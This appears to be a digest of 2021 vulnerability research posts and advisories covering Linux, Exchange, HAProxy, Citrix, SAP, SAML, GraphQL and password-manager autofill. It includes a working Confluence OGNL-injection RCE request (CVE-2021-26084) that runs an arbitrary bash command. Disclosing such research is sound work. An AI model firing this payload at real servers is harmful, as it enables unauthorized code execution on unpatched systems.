Sequoia: A Local Privilege Escalation Vulnerability in Linux’s Filesystem Layer (CVE-2021-33909)
👤 by Bharat Jogi
"The Qualys Research Team has discovered a size_t-to-int type conversion vulnerability in the Linux Kernel’s filesystem layer affecting most Linux operating systems. Any unprivileged user can gain root privileges on a vulnerable host by exploiting this vulnerability in a default configuration."
📝 Contents:
• About Linux Filesystem
• Impact
• Disclosure Timeline
• Proof of Concept Video
• Technical Details
• Solution
• Qualys Coverage
• Dashboard
• Vendor References
• Frequently Asked Questions (FAQs)
https://blog.qualys.com/vulnerabilities-threat-research/2021/07/20/sequoia-a-local-privilege-escalation-vulnerability-in-linuxs-filesystem-layer-cve-2021-33909
Cisco fixed a Post-Auth RCE (CVE-2021-1518) in Firepower Device Manager found by our researchers Nikita Abramov and Mikhail Klyuchnikov.
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fdm-rce-Rx6vVurq
You should turn off autofill in your password manager
👤 by @marektoth
11 of the 16 tested browser and password manager combinations, using default configurations and adhering to best-practices, could be compromised in one mouse click by the user, allowing attackers access to plain-text saved login credentials.
📝 Contents:
• Autofill
• Autofill in chromium-based browsers
• Abuse of the autofill? Cross-Site Scripting (XSS)
• Analysis of browsers and password managers
• Limitation
• Script and demo
• Clickjacking KeePassXC-Browser
• Potential risks for users
• Potential risks for companies / Recommendation for InfoSec
• Recommendation
• Conclusion
https://marektoth.com/blog/password-managers-autofill/
NTLM relaying to AD CS - On certificates, printers and a little hippo
👤 by @_dirkjan
More Active Directory NTLM relaying wizardry from Dirk-jan, this time aggregating and unifying multiple different tools and techniques, culminating in the release of PKINITtools.
📝 Contents:
• Background - the state of NTLM relaying
• Exploring AD CS relaying
• Abusing the obtained certificate - diving into PKINIT
• Obtaining the NT hash of the impersonated computer account
• Using S4U2Self to obtain access to the relayed machine
• Other abuse avenues of PetitPotam
• Defenses
• Credits / Thanks / Tools
https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/
SAML is insecure by design
👤 by @joonas_fi
"In summary: once you base your security on some computed property, you can now exploit any flaws, differences or ambiguity in this computation. The more complex the computation is, the more dangerous it gets."
📝 Contents:
• What is SAML?
• Why should I care?
• Why is SAML insecure?
• Why is signing computed values dangerous?
• The SAML vulnerability in practice
• Why is SAML this way?
• Vulnerability mitigation
• How could SAML have been designed better?
• More SAML weirdness
• Why is SAML used if it sucks?
• Action
• Ignorance is bliss
• Additional reading
https://joonas.fi/2021/08/saml-is-insecure-by-design/
MyBB fixed a Persistent XSS (CVE-2021-27279) in MyBB < 1.8.25 found by our researcher Igor Sak-Sakovskiy.
RCE is possible when chained with CVE-2021-27890, reported by Simon Scannell & Carl Smith.
Advisory: https://mybb.com/versions/1.8.25/
🙈🙉🙊Citrix has removed the acknowledgement of our researcher Mikhail Klyuchnikov who discovered and reported CVE-2019-19781 - the Citrix ADC RCE!
Current: https://support.citrix.com/article/CTX267027
Mar 2021: http://web.archive.org/web/20210321090412/https://support.citrix.com/article/CTX267027
PROXYTOKEN: AN AUTHENTICATION BYPASS IN MICROSOFT EXCHANGE SERVER
👤 by Simon Zuckerbraun
With this vulnerability, an unauthenticated attacker can perform configuration actions on mailboxes belonging to arbitrary users, for example copying all emails addressed to a target account and forwarding them to an attacker-controlled account. The vulnerability arises due to the authentication module not being loaded on the back end.
📝 Contents:
• The Trigger
• Understanding the Root Cause
• Bagging a Canary
• Conclusion
https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server
Exploiting GraphQL
👤 by @infosec_au
Overview of GraphQL attacks.
📝 Contents:
• Intro
• BatchQL
• Introspection
• Suggestions
• CSRF
• JSON list based batching
• Query name based batching
• Conclusion
https://blog.assetnote.io/2021/08/29/exploiting-graphql/
Remote Code Execution on Confluence Servers write-up (CVE-2021-26084)
👤 by rootxharsh and iamnoooob
Patch diffing the latest Confluence update results in an RCE PoC.
PoC:
POST /pages/doenterpagevariables.action HTTP/2
Host: localhost
Content-Length: 301
Content-Type: application/x-www-form-urlencoded

queryString=aaa\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022javax.script.ScriptEngineManager\u0022).newInstance().getEngineByName(\u0022js\u0022).eval(\u0022var x=new java.lang.ProcessBuilder;x.command([\u0027/bin/bash\u0027,\u0027-c\u0027,\u0027'.$cmd.'\u0027]);x.start()\u0022)}%2b\u0027
📝 Contents:
• Analyzing the hot patch
• Bypassing isSafeExpression
• Bonus - Better Payload
• Bonus - Debugging
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
SAP refused to disclose which CVEs were assigned to vulnerabilities reported by our researcher Mikhail Klyuchnikov, if any.
Three subsequent letters remain unanswered.
We believe the CVEs to be CVE-2021-33690 (CVSS 9.9) and CVE-2021-33691 (CVSS 6.9) in the August hotfix.
Join the discussion on Twitter: https://twitter.com/ptswarm/status/1433070547399757824
RCE on a backend IIS server via file upload with an atypical file extension.
More community curated payloads can be found at https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP
Critical Vulnerability in HAProxy (CVE-2021-40346): Integer Overflow Enables HTTP Smuggling
👤 by Ori Hollander and Or Peles
The vulnerability, CVE-2021-40346, is an Integer Overflow, triggerable via the Content-Length HTTP header, that makes it possible to conduct HTTP Request Smuggling attacks.
📝 Contents:
• Technical Background
• HTTP Request Smuggling
• HAProxy’s HTTP request processing phases (simplified)
• Attack Scenario – Bypassing http-request ACLs
• What happens inside HAProxy
• Getting the HTTP response for the smuggled request
• Attack demonstration – ACL bypass
• Vulnerability Details
• Automating the Discovery
• Fixes and Workarounds
https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/
The complete GraphQL Security Guide: Fixing the 13 most common GraphQL Vulnerabilities to make your API production ready
👤 by @jensneuse_de
The complete GraphQL security guide. 'Nuff said.
📝 Contents:
• The 13 most common GraphQL Vulnerabilities
• Solving the 13 most common GraphQL Vulnerabilities for private APIs
• Solving the 13 most common GraphQL Vulnerabilities for public APIs
https://wundergraph.com/blog/the_complete_graphql_security_guide_fixing_the_13_most_common_graphql_vulnerabilities_to_make_your_api_production_ready
SAP fixed Post-Auth RCE (CVE-2021-38163) in SAP NetWeaver found by our researcher Mikhail Klyuchnikov.
CVSS 9.9 🔥
No credits from SAP again.
Advisory: https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=585106405
RCE in Citrix ShareFile Storage Zones Controller (CVE-2021-22941) – A Walk-Through
👤 by Markus Wulftange
The vulnerability is triggerable when processing user upload requests and can lead to unauthorized RCE.
📝 Contents:
• Background
• The Travelogue
• Finding A Path From Sink To Source
• Are We Still on Track?
• What's in the backpack?
• Running With Razor
• Timeline and fix
https://codewhitesec.blogspot.com/2021/09/citrix-sharefile-rce-cve-2021-22941.html
We are thrilled to announce the following presentations at @hardwear_io, @blackhatevents, #POC2021 and @hackinparis
Autodiscovering the Great Leak
👤 by Amit Serper
A design flaw in the Autodiscover protocol makes it possible for an attacker who controls top-level Autodiscover domains (or who can conduct a DNS-poisoning attack using these domains) to obtain valid domain credentials from leaky Autodiscover requests.
📝 Contents:
• Executive summary
• Introduction
• What is Autodiscover?
• Abusing the Leak
• The ol’ switcheroo
• Mitigation
• Conclusion
https://www.guardicore.com/labs/autodiscovering-the-great-leak/